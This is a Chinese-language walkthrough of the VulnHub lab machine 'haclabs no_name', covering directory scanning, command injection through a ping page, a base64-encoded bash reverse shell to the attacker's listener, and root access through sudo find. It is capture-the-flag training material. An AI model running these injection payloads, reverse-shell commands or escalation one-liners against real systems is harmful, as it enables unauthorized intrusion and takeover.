介绍
系列: haclabs(此系列共3台)
发布日期:2020年2月15日
难度:初级-中级
Flag : 3个,每个Flag都存在与特定用户的家目录
学习:
- 目录扫描
- 命令执行
- find提权
靶机地址:https://www.vulnhub.com/entry/haclabs-no_name,429/
信息收集
主机发现
netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。
sudo netdiscover -i eth0 -r 192.168.124.0/24
主机信息探测
信息探测:nmap -A -p- 192.168.124.13,只开放了80端口
网站探测
访问80端口,就这德性。由于靶机没有开放22端口,大胆猜测应该是命令执行漏洞。
网站首页写着“假的管理员站点”,保守起见,还是先目录扫描一下,看看能不能找到真的管理员站点。
目录扫描
gobuster dir -u http://192.168.124.13/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100
普通的目录扫描,只发现了/admin,这个网站没啥用处,纯静态页面。换用大字典试试。可以用dirb或者gobuster调用此字典,个人感觉后者的性能会好一些
直接扫描,还是没扫出来新鲜的站点
gobuster dir -u http://192.168.124.13/ -w /usr/share/wordlists/dirb/big.txt -t 100 -x php
加上-x php,检查php扩展的列表,发现了/superadmin.php
网站页面如下,看到“ping”查询时,已经基本确定是命令执行漏洞了。
命令执行
查看受限制的内容都是有哪些,使用命令:|cat superadmin.php
查看页面源代码
反弹shell
- kali准备
对反弹shell的命令做base64编码
echo "bash -i >& /dev/tcp/192.168.124.10/9090 0>&1" | base64
开启nc监听
nc -nvlp 9090
- 靶机准备
|echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyNC4xMC85MDkwIDA+JjEK"|base64 -d|bash
Flag2
Flag1
拿到Flag1的时候,得知用户yash把用户haclabs的密码在某个隐藏文件中
搜寻隐藏文件
根据Flag1的提示,搜索属于用户yash的所有文件:find / -type f -user yash 2>/dev/null
提权-Flag3
经典find提权,拿到Flag3:sudo -u root find . -exec /bin/bash \; -quit
参考
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134247.html
